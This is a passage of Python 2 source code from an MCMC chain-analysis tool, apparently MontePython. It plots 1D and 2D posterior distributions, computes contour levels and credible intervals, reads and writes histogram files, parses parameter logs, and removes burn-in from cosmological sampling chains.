for s in info.ticks[info.native_index]],
fontsize=info.ticksize)
ax1d.axis([info.x_range[info.native_index][0],
info.x_range[info.native_index][1],
0, 1.05])
# Execute some customisation scripts for the 1d plots
if (info.custom1d != []):
for elem in info.custom1d:
execfile('plot_files/'+elem)
##################################################
# plot 1D posterior in 1D plot #
##################################################
ax1d.plot(
info.interp_grid,
# gaussian filtered 1d posterior:
smoothed_interp_hist,
# raw 1d posterior:
#info.interp_hist,
lw=info.line_width, ls='-',
color = info.MP_color_cycle[info.id][1],
# the [1] picks up the color of the 68% contours
# with [0] you would get that of the 95% contours
alpha = info.alphas[info.id])
# uncomment if you want to see the raw points from the histogram
# (to check whether the interpolation and smoothing generated artefacts)
#ax1d.plot(
# info.bincenters,
# info.hist,
# 'ro')
if conf.mean_likelihood:
for info in information_instances:
if not info.ignore_param:
try:
# 1D mean likelihood normalised to P_max=1 (first step)
#
# simply the histogram from the chains, weighted by multiplicity*likelihood
#
lkl_mean, _ = np.histogram(
info.chain[:, info.native_index+2],
bins=info.bin_edges,
normed=False,
weights=np.exp(
conf.min_minus_lkl-info.chain[:, 1])*info.chain[:, 0])
lkl_mean /= lkl_mean.max()
# 1D mean likelihood normalised to P_max=1 (second step)
#
# returns a histogram still normalised to one, but with a ten times finer sampling;
# >> first, tries a method with spline interpolation between bin centers and extrapolation at the edges
# >> if it fails, a simpler and more robust method of linear interpolation between bin centers is used
# >> if the interpolation module is not installed, this step keeps the same posterior
#
interp_lkl_mean, interp_grid = cubic_interpolation(
info, lkl_mean, info.bincenters)
# 1D mean likelihood normalised to P_max=1 (third step, used only for plotting)
#
# apply gaussian smoothing
#
# smooth
smoothed_interp_lkl_mean = scipy.ndimage.filters.gaussian_filter(interp_lkl_mean,sigma)
# re-normalised
smoothed_interp_lkl_mean = smoothed_interp_lkl_mean/smoothed_interp_lkl_mean.max()
# Execute some customisation scripts for the 1d plots
if (info.custom1d != []):
for elem in info.custom1d:
execfile('plot_files/'+elem)
########################################################
# plot 1D mean likelihood in diagonal of triangle plot #
########################################################
if conf.plot_2d:
# raw mean likelihoods:
#ax2d.plot(info.bincenter, lkl_mean,
# ls='--', lw=conf.line_width,
# color = info.MP_color_cycle[info.id][1],
# alpha = info.alphas[info.id])
# smoothed and interpolated mean likelihoods:
ax2d.plot(interp_grid, smoothed_interp_lkl_mean,
ls='--', lw=conf.line_width,
color = info.MP_color_cycle[info.id][1],
alpha = info.alphas[info.id])
########################################################
# plot 1D mean likelihood in 1D plot #
########################################################
if conf.plot:
# raw mean likelihoods:
#ax1d.plot(info.bincenters, lkl_mean,
# ls='--', lw=conf.line_width,
# color = info.MP_color_cycle[info.id][1],
# alpha = info.alphas[info.id])
# smoothed and interpolated mean likelihoods:
ax1d.plot(interp_grid, smoothed_interp_lkl_mean,
ls='--', lw=conf.line_width,
color = info.MP_color_cycle[info.id][1],
alpha = info.alphas[info.id])
except:
print 'could not find likelihood contour for ',
print info.ref_parameters[info.native_index]
if conf.subplot is True:
if conf.plot_2d:
extent2d = ax2d.get_window_extent().transformed(
fig2d.dpi_scale_trans.inverted())
fig2d.savefig(os.path.join(
conf.folder, 'plots', file_name+'.'+conf.extension),
bbox_inches=extent2d.expanded(1.1, 1.4))
if conf.plot:
extent1d = ax1d.get_window_extent().transformed(
fig1d.dpi_scale_trans.inverted())
fig1d.savefig(os.path.join(
conf.folder, 'plots', file_name+'.'+conf.extension),
bbox_inches=extent1d.expanded(1.1, 1.4))
# Store the function in a file
for info in information_instances:
if not info.ignore_param:
hist_file_name = os.path.join(
info.folder, 'plots',
info.basename+'_%s.hist' % (
standard_name))
write_histogram(hist_file_name,
info.interp_grid, info.interp_hist)
# Now do the rest of the triangle plot
if conf.plot_2d:
for second_index in xrange(index):
second_name = plotted_parameters[second_index]
for info in information_instances:
if not info.ignore_param:
try:
info.native_second_index = info.ref_names.index(
plotted_parameters[second_index])
info.has_second_param = True
second_standard_name = info.backup_names[
info.native_second_index]
except ValueError:
info.has_second_param = False
else:
info.has_second_param = False
ax2dsub = fig2d.add_subplot(
len(plotted_parameters),
len(plotted_parameters),
(index)*len(plotted_parameters)+second_index+1)
for info in information_instances:
if info.has_second_param:
ax2dsub.axis([info.x_range[info.native_second_index][0],
info.x_range[info.native_second_index][1],
info.x_range[info.native_index][0],
info.x_range[info.native_index][1]])
# 2D likelihood (first step)
#
# simply the histogram from the chains, with few bins only
#
info.n, info.xedges, info.yedges = np.histogram2d(
info.chain[:, info.native_index+2],
info.chain[:, info.native_second_index+2],
weights=info.chain[:, 0],
bins=(info.bins, info.bins),
normed=False)
info.extent = [
info.x_range[info.native_second_index][0],
info.x_range[info.native_second_index][1],
info.x_range[info.native_index][0],
info.x_range[info.native_index][1]]
info.x_centers = 0.5*(info.xedges[1:]+info.xedges[:-1])
info.y_centers = 0.5*(info.yedges[1:]+info.yedges[:-1])
# 2D likelihood (second step)
#
# like for 1D, interpolate to get a finer grid
# TODO: we should not only interpolate between bin centers, but also extrapolate between side bin centers and bin edges
#
interp_y_centers = scipy.ndimage.zoom(info.y_centers,info.interpolation_smoothing, mode='reflect')
interp_x_centers = scipy.ndimage.zoom(info.x_centers,info.interpolation_smoothing, mode='reflect')
interp_likelihood = scipy.ndimage.zoom(info.n,info.interpolation_smoothing, mode='reflect')
# 2D likelihood (third step)
#
# gaussian smoothing
#
sigma = info.interpolation_smoothing*info.gaussian_smoothing
interp_smoothed_likelihood = scipy.ndimage.filters.gaussian_filter(interp_likelihood,[sigma,sigma], mode='reflect')
# Execute some customisation scripts for the 2d contour plots
if (info.custom2d != []):
for elem in info.custom2d:
execfile('plot_files/'+elem)
# plotting contours, using the ctr_level method (from Karim
# Benabed). Note that only the 1 and 2 sigma contours are
# displayed (due to the line with info.levels[:2])
try:
###########################
# plot 2D filled contours #
###########################
if not info.contours_only:
contours = ax2dsub.contourf(
interp_y_centers,
interp_x_centers,
interp_smoothed_likelihood,
extent=info.extent,
levels=ctr_level(
interp_smoothed_likelihood,
info.levels[:2]),
zorder=4,
colors = info.MP_color_cycle[info.id],
alpha=info.alphas[info.id])
# now add a thin darker line
# around the 95% contour
ax2dsub.contour(
interp_y_centers,
interp_x_centers,
interp_smoothed_likelihood,
extent=info.extent,
levels=ctr_level(
interp_smoothed_likelihood,
info.levels[1:2]),
zorder=4,
colors = info.MP_color_cycle[info.id][1],
alpha = info.alphas[info.id],
linewidths=1)
###########################
# plot 2D contours #
###########################
if info.contours_only:
contours = ax2dsub.contour(
interp_y_centers,
interp_x_centers,
interp_smoothed_likelihood,
extent=info.extent, levels=ctr_level(
interp_smoothed_likelihood,
info.levels[:2]),
zorder=4,
colors = info.MP_color_cycle[info.id],
alpha = info.alphas[info.id],
linewidths=info.line_width)
except Warning:
warnings.warn(
"The routine could not find the contour of the " +
"'%s-%s' 2d-plot" % (
info.plotted_parameters[info.native_index],
info.plotted_parameters[info.native_second_index]))
except ValueError as e:
if str(e) == "Contour levels must be increasing":
warnings.warn(
"The routine could not find the contour of the " +
"'%s-%s' 2d-plot. \n " % (
info.plotted_parameters[info.native_index],
info.plotted_parameters[info.native_second_index]) +
'The error is: "Contour levels must be increasing"' +
" but " + str(ctr_level(info.n, info.levels[:2])) +
" were found. This may happen when most" +
" points fall in the same bin.")
else:
warnings.warn(
"The routine could not find the contour of the " +
"'%s-%s' 2d-plot" % (
info.plotted_parameters[info.native_index],
info.plotted_parameters[info.native_second_index]))
ax2dsub.set_xticks(info.ticks[info.native_second_index])
ax2dsub.set_yticks(info.ticks[info.native_index])
ax2dsub.tick_params('both',direction='inout',top=True,bottom=True,left=True,right=True)
if index == len(plotted_parameters)-1:
ax2dsub.set_xticklabels(
['%.{0}g'.format(info.decimal) % s for s in
info.ticks[info.native_second_index]],
fontsize=info.ticksize)
if conf.legend_style == 'sides':
ax2dsub.set_xlabel(
info.tex_names[info.native_second_index],
fontsize=info.fontsize)
else:
ax2dsub.set_xticklabels([''])
ax2dsub.set_yticks(info.ticks[info.native_index])
if second_index == 0:
ax2dsub.set_yticklabels(
['%.{0}g'.format(info.decimal) % s for s in
info.ticks[info.native_index]],
fontsize=info.ticksize)
else:
ax2dsub.set_yticklabels([''])
if conf.legend_style == 'sides':
if second_index == 0:
ax2dsub.set_ylabel(
info.tex_names[info.native_index],
fontsize=info.fontsize)
if conf.subplot is True:
# Store the individual 2d plots.
if conf.plot_2d:
area = ax2dsub.get_window_extent().transformed(
fig2d.dpi_scale_trans.inverted())
# Pad the saved area by 10% in the x-direction and 20% in
# the y-direction
fig2d.savefig(os.path.join(
conf.folder, 'plots',
file_name+'_2d_%s-%s.%s' % (
standard_name, second_standard_name,
conf.extension)),
bbox_inches=area.expanded(1.4, 1.4))
# store the coordinates of the points for further
# plotting.
store_contour_coordinates(
conf, standard_name, second_standard_name, contours)
for info in information_instances:
if not info.ignore_param and info.has_second_param:
info.hist_file_name = os.path.join(
info.folder, 'plots',
'{0}_2d_{1}-{2}.hist'.format(
info.basename,
standard_name,
second_standard_name))
write_histogram_2d(
info.hist_file_name, info.x_centers, info.y_centers,
info.extent, info.n)
print '-----------------------------------------------'
if conf.plot:
print '--> Saving figures to .{0} files'.format(info.extension)
plot_name = '-vs-'.join([os.path.split(elem.folder)[-1]
for elem in information_instances])
if conf.plot_2d:
# Legend of triangle plot
if ((conf.plot_legend_2d is None) and (len(legends) > 1)) or (conf.plot_legend_2d == True):
# Create a virtual subplot in the top right corner,
# just to be able to anchor the legend nicely
ax2d = fig2d.add_subplot(
len(plotted_parameters),
len(plotted_parameters),
len(plotted_parameters),
)
ax2d.axis('off')
try:
ax2d.legend(legends, legend_names,
loc='upper right',
borderaxespad=0.,
fontsize=info.legendsize)
except TypeError:
ax2d.legend(legends, legend_names,
loc='upper right',
borderaxespad=0.,
prop={'fontsize': info.legendsize})
fig2d.subplots_adjust(wspace=0, hspace=0)
fig2d.savefig(
os.path.join(
conf.folder, 'plots', '{0}_triangle.{1}'.format(
plot_name, info.extension)),
bbox_inches='tight')
# Legend of 1D plot
if conf.plot:
if ((conf.plot_legend_1d is None) and (len(legends) > 1)) or (conf.plot_legend_1d == True):
# no space left: add legend to the right
if len(plotted_parameters)<num_columns*num_lines:
fig1d.legend(legends, legend_names,
loc= ((num_columns-0.9)/num_columns,0.1/num_columns),
fontsize=info.legendsize)
# space left in lower right part: add legend there
else:
fig1d.legend(legends, legend_names,
loc= 'center right',
bbox_to_anchor = (1.2,0.5),
fontsize=info.legendsize)
fig1d.tight_layout()
fig1d.savefig(
os.path.join(
conf.folder, 'plots', '{0}_1d.{1}'.format(
plot_name, info.extension)),
bbox_inches='tight')
def ctr_level(histogram2d, lvl, infinite=False):
"""
Extract the contours for the 2d plots (Karim Benabed)
"""
hist = histogram2d.flatten()*1.
hist.sort()
cum_hist = np.cumsum(hist[::-1])
cum_hist /= cum_hist[-1]
alvl = np.searchsorted(cum_hist, lvl)[::-1]
clist = [0]+[hist[-i] for i in alvl]+[hist.max()]
if not infinite:
return clist[1:]
return clist
def minimum_credible_intervals(info):
"""
Extract minimum credible intervals (method from Jan Haman) FIXME
"""
histogram = info.hist
bincenters = info.bincenters
levels = info.levels
bounds = np.zeros((len(levels), 2))
j = 0
delta = bincenters[1]-bincenters[0]
left_edge = max(histogram[0] - 0.5*(histogram[1]-histogram[0]), 0.)
right_edge = max(histogram[-1] + 0.5*(histogram[-1]-histogram[-2]), 0.)
failed = False
for level in levels:
norm = float(
(np.sum(histogram)-0.5*(histogram[0]+histogram[-1]))*delta)
norm += 0.25*(left_edge+histogram[0])*delta
norm += 0.25*(right_edge+histogram[-1])*delta
water_level_up = np.max(histogram)*1.0
water_level_down = np.min(histogram)*1.0
top = 0.
iterations = 0
while (abs((top/norm)-level) > 0.0001) and not failed:
top = 0.
water_level = (water_level_up + water_level_down)/2.
#ontop = [elem for elem in histogram if elem > water_level]
indices = [i for i in range(len(histogram))
if histogram[i] > water_level]
# check for multimodal posteriors
if ((indices[-1]-indices[0]+1) != len(indices)):
warnings.warn(
"could not derive minimum credible intervals " +
"for this multimodal posterior")
warnings.warn(
"please try running longer chains or reducing " +
"the number of bins with --bins BINS (default: 20)")
failed = True
break
top = (np.sum(histogram[indices]) -
0.5*(histogram[indices[0]]+histogram[indices[-1]]))*(delta)
# left
if indices[0] > 0:
top += (0.5*(water_level+histogram[indices[0]]) *
delta*(histogram[indices[0]]-water_level) /
(histogram[indices[0]]-histogram[indices[0]-1]))
else:
if (left_edge > water_level):
top += 0.25*(left_edge+histogram[indices[0]])*delta
else:
top += (0.25*(water_level + histogram[indices[0]]) *
delta*(histogram[indices[0]]-water_level) /
(histogram[indices[0]]-left_edge))
# right
if indices[-1] < (len(histogram)-1):
top += (0.5*(water_level + histogram[indices[-1]]) *
delta*(histogram[indices[-1]]-water_level) /
(histogram[indices[-1]]-histogram[indices[-1]+1]))
else:
if (right_edge > water_level):
top += 0.25*(right_edge+histogram[indices[-1]])*delta
else:
top += (0.25*(water_level + histogram[indices[-1]]) *
delta * (histogram[indices[-1]]-water_level) /
(histogram[indices[-1]]-right_edge))
if top/norm >= level:
water_level_down = water_level
else:
water_level_up = water_level
# safeguard, just in case
iterations += 1
if (iterations > 1000):
warnings.warn(
"the loop to check for sigma deviations was " +
"taking too long to converge")
failed = True
break
# min
if failed:
bounds[j][0] = np.nan
elif indices[0] > 0:
bounds[j][0] = bincenters[indices[0]] - delta*(histogram[indices[0]]-water_level)/(histogram[indices[0]]-histogram[indices[0]-1])
else:
if (left_edge > water_level):
bounds[j][0] = bincenters[0]-0.5*delta
else:
bounds[j][0] = bincenters[indices[0]] - 0.5*delta*(histogram[indices[0]]-water_level)/(histogram[indices[0]]-left_edge)
# max
if failed:
bounds[j][1] = np.nan
elif indices[-1] < (len(histogram)-1):
bounds[j][1] = bincenters[indices[-1]] + delta*(histogram[indices[-1]]-water_level)/(histogram[indices[-1]]-histogram[indices[-1]+1])
else:
if (right_edge > water_level):
bounds[j][1] = bincenters[-1]+0.5*delta
else:
bounds[j][1] = bincenters[indices[-1]] + \
0.5*delta*(histogram[indices[-1]]-water_level) / \
(histogram[indices[-1]]-right_edge)
j += 1
for elem in bounds:
for j in (0, 1):
elem[j] -= info.mean[info.native_index]
return bounds
def write_h(info_file, indices, name, string, quantity, modifiers=None):
"""
Write one horizontal line of output
"""
info_file.write('\n '+name+'\t: ')
for i in indices:
info_file.write(string % quantity[i]+'\t')
def cubic_interpolation(info, hist, bincenters):
"""
Small routine to accommodate the absence of the interpolate module
"""
# we start from a try because if anything goes wrong, we want to return the raw histogram rather than nothing
try:
# test that all elements are strictly positive, otherwise we could not take the log, and we must switch to the robust method
for i,elem in enumerate(hist):
if elem == 0.:
hist[i] = 1.e-99
elif elem < 0:
print hist[i]
raise Exception()
# One of our methods (using polyfit) does assume that the input histogram has a maximum value of 1.
# If in a future version this is not guaranteed anymore, we should renormalise it here.
# This is important for computing weights and thresholds.
# The threshold below which the likelihood will be
# approximated as zero is hard-coded here (it could become an
# input parameter, but that would not clearly be useful):
threshold = 1.e-3
# prepare the interpolation on log(Like):
ln_hist = np.log(hist)
# define a finer grid on a wider range (assuming that the following method is fine both for inter- and extra-polation)
left = max(info.boundaries[info.native_index][0],bincenters[0]-2.5*(bincenters[1]-bincenters[0]))
right = min(info.boundaries[info.native_index][1],bincenters[-1]+2.5*(bincenters[-1]-bincenters[-2]))
interp_grid = np.linspace(left, right, (len(bincenters)+4)*10+1)
######################################
# polynomial fit method (default): #
######################################
if info.posterior_smoothing >= 2:
# the points in the histogram with a very low likelihood (i.e. hist[i]<<1, since hist is normalised to a maximum of one)
# have a lot of Poisson noise and are unreliable. However, if we do nothing, they may dominate the outcome of the fitted polynomial.
# Hence we can:
# 1) give them less weight (weight = sqrt(hist) seems to work well)
# 2) cut them at some threshold value and base the fit only on higher points
# 3) both
# the one working best seems to be 2). We also wrote 1) below, but commented out.
# method 1):
#f = np.poly1d(np.polyfit(bincenters,ln_hist,info.posterior_smoothing,w=np.sqrt(hist)))
#interp_hist = f(interp_grid)
# method 2):
# find index values such that hist is negligible everywhere except between hist[sub_indices[0]] and hist[sub_indices[-1]]
sub_indices = [i for i,elem in enumerate(hist) if elem > threshold]
# The fit is done precisely in this range: bincenters[sub_indices[0]] < x < bincenters[sub_indices[-1]]
g = np.poly1d(np.polyfit(bincenters[sub_indices],ln_hist[sub_indices],info.posterior_smoothing)) #,w=np.sqrt(hist[sub_indices])))
# The extrapolation is done in a range including one more bin on each side, except when the boundary is hit
extrapolation_range_left = [info.boundaries[info.native_index][0] if sub_indices[0] == 0 else bincenters[sub_indices[0]-1]]
extrapolation_range_right = [info.boundaries[info.native_index][1] if sub_indices[-1] == len(hist)-1 else bincenters[sub_indices[-1]+1]]
# outside of this range, log(L) is brutally set to a negligible value, log(1.e-10)
interp_hist = [g(elem) if (elem > extrapolation_range_left and elem < extrapolation_range_right) else np.log(1.e-10) for elem in interp_grid]
elif info.posterior_smoothing<0:
raise io_mp.AnalyzeError(
"You passed --posterior-smoothing %d, this value is not understood"%info.posterior_smoothing)
############################################################
# other methods: #
# - linear inter/extra-polation if posterior_smoothing = 0 #
# - cubic inter/extra-polation if posterior_smoothing = 1 #
############################################################
else:
# try first inter/extra-polation
try:
# prepare to interpolate and extrapolate:
if info.posterior_smoothing == 0:
f = scipy.interpolate.interp1d(bincenters, ln_hist, kind='linear', fill_value='extrapolate')
else:
f = scipy.interpolate.interp1d(bincenters, ln_hist, kind='cubic', fill_value='extrapolate')
interp_hist = f(interp_grid)
# failure probably caused by old scipy not having the fill_value='extrapolate' argument. Then, only interpolate.
except:
# define a finer grid but not a wider one
left = max(info.boundaries[info.native_index][0],bincenters[0])
right = min(info.boundaries[info.native_index][1],bincenters[-1])
interp_grid = np.linspace(left, right, len(bincenters)*10+1)
# prepare to interpolate only:
if info.posterior_smoothing == 0:
f = scipy.interpolate.interp1d(bincenters, ln_hist, kind='linear')
else:
f = scipy.interpolate.interp1d(bincenters, ln_hist, kind='cubic')
interp_hist = f(interp_grid)
# final steps used by all methods
# go back from ln_Like to Like
interp_hist = np.exp(interp_hist)
# re-normalise the interpolated curve
interp_hist = interp_hist / interp_hist.max()
return interp_hist, interp_grid
except:
# we will end up here if anything went wrong before
# do nothing (raw histogram)
warnings.warn(
"The 1D posterior could not be processed normally, probably" +
"due to incomplete or obsolete numpy and/or scipy versions." +
"So the raw histograms will be plotted.")
return hist, bincenters
def write_histogram(hist_file_name, x_centers, hist):
"""
Store the posterior distribution to a file
"""
with open(hist_file_name, 'w') as hist_file:
hist_file.write("# 1d posterior distribution\n")
hist_file.write("\n# x_centers\n")
hist_file.write(", ".join(
[str(elem) for elem in x_centers])+"\n")
hist_file.write("\n# Histogram\n")
hist_file.write(", ".join(
[str(elem) for elem in hist])+"\n")
print 'wrote ', hist_file_name
def read_histogram(histogram_path):
"""
Recover a stored 1d posterior
"""
with open(histogram_path, 'r') as hist_file:
for line in hist_file:
if line:
if line.find("# x_centers") != -1:
x_centers = [float(elem) for elem in
hist_file.next().split(",")]
elif line.find("# Histogram") != -1:
hist = [float(elem) for elem in
hist_file.next().split(",")]
x_centers = np.array(x_centers)
hist = np.array(hist)
return x_centers, hist
def write_histogram_2d(hist_file_name, x_centers, y_centers, extent, hist):
"""
Store the histogram information to a file, to plot it later
"""
with open(hist_file_name, 'w') as hist_file:
hist_file.write("# Interpolated histogram\n")
hist_file.write("\n# x_centers\n")
hist_file.write(", ".join(
[str(elem) for elem in x_centers])+"\n")
hist_file.write("\n# y_centers\n")
hist_file.write(", ".join(
[str(elem) for elem in y_centers])+"\n")
hist_file.write("\n# Extent\n")
hist_file.write(", ".join(
[str(elem) for elem in extent])+"\n")
hist_file.write("\n# Histogram\n")
for line in hist:
hist_file.write(", ".join(
[str(elem) for elem in line])+"\n")
def read_histogram_2d(histogram_path):
"""
Read the histogram information that was stored in a file.
To use it, call something like this:
.. code::
x_centers, y_centers, extent, hist = read_histogram_2d(path)
fig, ax = plt.subplots()
ax.contourf(
y_centers, x_centers, hist, extent=extent,
levels=ctr_level(hist, [0.68, 0.95]),
zorder=5, cmap=plt.cm.autumn_r)
plt.show()
"""
with open(histogram_path, 'r') as hist_file:
length = 0
for line in hist_file:
if line:
if line.find("# x_centers") != -1:
x_centers = [float(elem) for elem in
hist_file.next().split(",")]
length = len(x_centers)
elif line.find("# y_centers") != -1:
y_centers = [float(elem) for elem in
hist_file.next().split(",")]
elif line.find("# Extent") != -1:
extent = [float(elem) for elem in
hist_file.next().split(",")]
elif line.find("# Histogram") != -1:
hist = []
for index in range(length):
hist.append([float(elem) for elem in
hist_file.next().split(",")])
x_centers = np.array(x_centers)
y_centers = np.array(y_centers)
extent = np.array(extent)
hist = np.array(hist)
return x_centers, y_centers, extent, hist
def clean_conversion(module_name, tag, folder):
"""
Execute the methods "convert" from the different sampling algorithms
Returns True if something was made, False otherwise
"""
has_module = False
subfolder_name = tag+"_subfolder"
try:
module = importlib.import_module(module_name)
subfolder = getattr(module, subfolder_name)
has_module = True
except ImportError:
# The module is not installed, the conversion can not take place
pass
if has_module and os.path.isdir(folder):
# Remove any potential trailing slash
folder = os.path.join(
*[elem for elem in folder.split(os.path.sep) if elem])
if folder.split(os.path.sep)[-1] == subfolder:
try:
getattr(module, 'from_%s_output_to_chains' % tag)(folder)
except IOError:
raise io_mp.AnalyzeError(
"You asked to analyze a %s folder which " % tag +
"seems to come from an unfinished run, or to be empty " +
"or corrupt. Please make sure the run went smoothly " +
"enough.")
warnings.warn(
"The content of the %s subfolder has been " % tag +
"translated for Monte Python. Please run an "
"analysis of the entire folder now.")
return True
else:
return False
def separate_files(files):
"""
Separate the input files in folder
Given all input arguments to the command line files entry, separate them in
a list of lists, grouping them by folders. The number of identified folders
will determine the number of information instances to create
"""
final_list = []
temp = [files[0]]
folder = (os.path.dirname(files[0]) if os.path.isfile(files[0])
else files[0])
if len(files) > 1:
for elem in files[1:]:
new_folder = (os.path.dirname(elem) if os.path.isfile(elem)
else elem)
if new_folder == folder:
temp.append(elem)
else:
folder = new_folder
final_list.append(temp)
temp = [elem]
final_list.append(temp)
return final_list
def recover_folder_and_files(files):
"""
Distinguish the cases when analyze is called with files or folder
Note that this takes place chronologically after the function
`separate_files`"""
# The following list defines the substring that a chain should contain for
# the code to recognise it as a proper chain.
substrings = ['.txt', '__']
# The following variable defines the substring that identifies error_log
# files, which therefore must not be taken into account in the analysis.
substring_err = 'error_log'
limit = 10
# If the first element is a folder, grab all chain files inside
if os.path.isdir(files[0]):
folder = os.path.normpath(files[0])
files = [os.path.join(folder, elem) for elem in os.listdir(folder)
if not os.path.isdir(os.path.join(folder, elem))
and not os.path.getsize(os.path.join(folder, elem)) < limit
and (substring_err not in elem)
and all([x in elem for x in substrings])]
# Otherwise, extract the folder from the chain file-name.
else:
# If the name is completely wrong, say it
if not os.path.exists(files[0]):
raise io_mp.AnalyzeError(
"You provided a non-existant folder/file to analyze")
folder = os.path.relpath(
os.path.dirname(os.path.realpath(files[0])), os.path.curdir)
files = [os.path.join(folder, elem) for elem in os.listdir(folder)
if os.path.join(folder, elem) in np.copy(files)
and not os.path.isdir(os.path.join(folder, elem))
and not os.path.getsize(os.path.join(folder, elem)) < limit
and (substring_err not in elem)
and all([x in elem for x in substrings])]
basename = os.path.basename(folder)
return folder, files, basename
def extract_array(line):
"""
Return the array on the RHS of the line
>>> extract_array("toto = ['one', 'two']\n")
['one', 'two']
>>> extract_array('toto = ["one", 0.2]\n')
['one', 0.2]
"""
# Recover RHS of the equal sign, and remove surrounding spaces
rhs = line.split('=')[-1].strip()
# Remove array signs
rhs = rhs.strip(']').lstrip('[')
# Recover each element of the list
sequence = [e.strip().strip('"').strip("'") for e in rhs.split(',')]
for index, elem in enumerate(sequence):
try:
sequence[index] = int(elem)
except ValueError:
try:
sequence[index] = float(elem)
except ValueError:
pass
return sequence
def extract_dict(line):
"""
Return the key and value of the dictionary element contained in line
>>> extract_dict("something['toto'] = [0, 1, 2, -2, 'cosmo']")
'toto', [0, 1, 2, -2, 'cosmo']
"""
# recovering the array
sequence = extract_array(line)
# Recovering only the LHS
lhs = line.split('=')[0].strip()
# Recovering the name from the LHS
name = lhs.split('[')[-1].strip(']')
name = name.strip('"').strip("'")
return name, sequence
def extract_parameter_names(info):
"""
Reading the log.param, store in the Information instance the names
"""
backup_names = []
plotted_parameters = []
boundaries = []
ref_names = []
tex_names = []
scales = []
with open(info.param_path, 'r') as param:
for line in param:
if line.find('#') == -1:
if line.find('data.experiments') != -1:
info.experiments = extract_array(line)
if line.find('data.parameters') != -1:
name, array = extract_dict(line)
original = name
# Rename the names according the .extra file (opt)
if name in info.to_change.iterkeys():
name = info.to_change[name]
# If the name corresponds to a varying parameter (fourth
# entry in the initial array being non-zero, or a derived
# parameter (it could be designated as fixed, it does not make
# any difference)), then continue the process of analyzing.
if array[3] != 0 or array[5] == 'derived':
# The real name is always kept, to have still the class
# names in the covmat
backup_names.append(original)
# With the list "to_plot", we can potentially restrict
# the variables plotted. If it is empty, though, simply
# all parameters will be plotted.
if info.to_plot == []:
plotted_parameters.append(name)
else:
if name in info.to_plot:
plotted_parameters.append(name)
# Append to the boundaries array
boundaries.append([
None if elem == 'None' or (isinstance(elem, int)
and elem == -1)
else elem for elem in array[1:3]])
ref_names.append(name)
# Take care of the scales
scale = array[4]
rescale = 1.
if name in info.new_scales.iterkeys():
scale = info.new_scales[name]
rescale = info.new_scales[name]/array[4]
scales.append(rescale)
# Given the scale, decide for the pretty tex name
number = 1./scale
tex_names.append(
io_mp.get_tex_name(name, number=number))
scales = np.diag(scales)
info.ref_names = ref_names
info.tex_names = tex_names
info.boundaries = boundaries
info.backup_names = backup_names
info.scales = scales
# Beware, the following two numbers are different. The first is the total
# number of parameters stored in the chain, whereas the second is for
# plotting purpose only.
info.number_parameters = len(ref_names)
info.plotted_parameters = plotted_parameters
def find_maximum_of_likelihood(info):
"""
Finding the global maximum of likelihood
min_minus_lkl first collects, for each chain file, the minimum of
-log(likelihood) (i.e. that chain's maximum of likelihood), and is then
replaced by the overall minimum. This way, the global maximum likelihood
will be used as a reference, and not each chain's own maximum.
"""
min_minus_lkl = []
for chain_file in info.files:
# cheese will brutally contain everything (- log likelihood) in the
# file chain_file being scanned.
# This could potentially be faster with pandas, but is already quite
# fast
#
# This would read the chains including comment lines:
#cheese = (np.array([float(line.split()[1].strip())
# for line in open(chain_file, 'r')]))
#
# This reads the chains excluding comment lines:
with open(chain_file, 'r') as f:
cheese = (np.array([float(line.split()[1].strip())
for line in ifilterfalse(iscomment,f)]))
try:
min_minus_lkl.append(cheese[:].min())
except ValueError:
pass
# beware, it is the min because we are talking about
# '- log likelihood'
# Selecting only the true maximum.
try:
min_minus_lkl = min(min_minus_lkl)
except ValueError:
raise io_mp.AnalyzeError(
"No decently sized chain was found in the desired folder. " +
"Please wait to have more accepted point before trying " +
"to analyze it.")
info.min_minus_lkl = min_minus_lkl
def remove_bad_points(info):
"""
Create an array with all the points from the chains, after removing the non-markovian points, the burn-in and, if requested, a fixed fraction at the start of each chain
"""
# spam will brutally contain all the chains with sufficient number of
# points, after the burn-in was removed.
spam = list()
# Recover the longest file name, for pleasing display
max_name_length = max([len(e) for e in info.files])
# Total number of steps done:
steps = 0
accepted_steps = 0
# Open the log file
log = open(info.log_path, 'w')
for index, chain_file in enumerate(info.files):
# To improve presentation, and print only once the full path of the
# analyzed folder, we recover the length of the path name, and
# create an empty complementary string of this length
total_length = 18+max_name_length
empty_length = 18+len(os.path.dirname(chain_file))+1
basename = os.path.basename(chain_file)
if index == 0:
exec "print '--> Scanning file %-{0}s' % chain_file,".format(
max_name_length)
else:
exec "print '%{0}s%-{1}s' % ('', basename),".format(
empty_length, total_length-empty_length)
# cheese will brutally contain everything in the chain chain_file being
# scanned
#
# This would read the chains including comment lines:
#cheese = (np.array([[float(elem) for elem in line.split()]
# for line in open(chain_file, 'r')]))
#
# This read the chains excluding comment lines:
with open(chain_file, 'r') as f:
cheese = (np.array([[float(elem) for elem in line.split()]
for line in ifilterfalse(iscomment,f)]))
# If the file contains a broken line with a different number of
# elements, the previous array generation might fail, and will not have
# the correct shape. Hence the following command will fail. To avoid
# that, the error is caught.
try:
local_min_minus_lkl = cheese[:, 1].min()
except IndexError:
raise io_mp.AnalyzeError(
"Error while scanning %s." % chain_file +
" This file most probably contains "
"an incomplete line, rendering the analysis impossible. "
"I think that the following line(s) is(are) wrong:\n %s" % (
'\n '.join(
['-> %s' % line for line in
open(chain_file, 'r') if
len(line.split()) != len(info.backup_names)+2])))
line_count = float(sum(1 for line in open(chain_file, 'r')))
# Logging the information obtained until now.
number_of_steps = cheese[:, 0].sum()
log.write("%s\t " % os.path.basename(chain_file))
log.write(" Number of steps:%d\t" % number_of_steps)
log.write(" Steps accepted:%d\t" % line_count)
log.write(" acc = %.2g\t" % (float(line_count)/number_of_steps))
log.write("min(-loglike) = %.2f\n" % local_min_minus_lkl)
steps += number_of_steps
accepted_steps += line_count
# check if analyze() is called directly by the user, or by the mcmc loop during an updating phase
try:
# command_line.update is defined when called by the mcmc loop
info.update
except:
# in case it was not defined (i.e. when analyze() is called directly by user), set it to False
info.update = 0
# Removing non-markovian part, burn-in, and fraction= (1 - keep-fraction)
start = 0
markovian=0
try:
# Read all comments in chains about times when proposal was updated
# The last of these comments gives the number of lines to be skipped in the files
if info.markovian and not info.update:
with open(chain_file, 'r') as f:
for line in ifilter(iscomment,f):
start = int(line.split()[2])
markovian = start
# Remove burn-in, defined as all points until the likelihood reaches min_minus_lkl+LOG_LKL_CUTOFF
while cheese[start, 1] > info.min_minus_lkl+LOG_LKL_CUTOFF:
start += 1
burnin = start-markovian
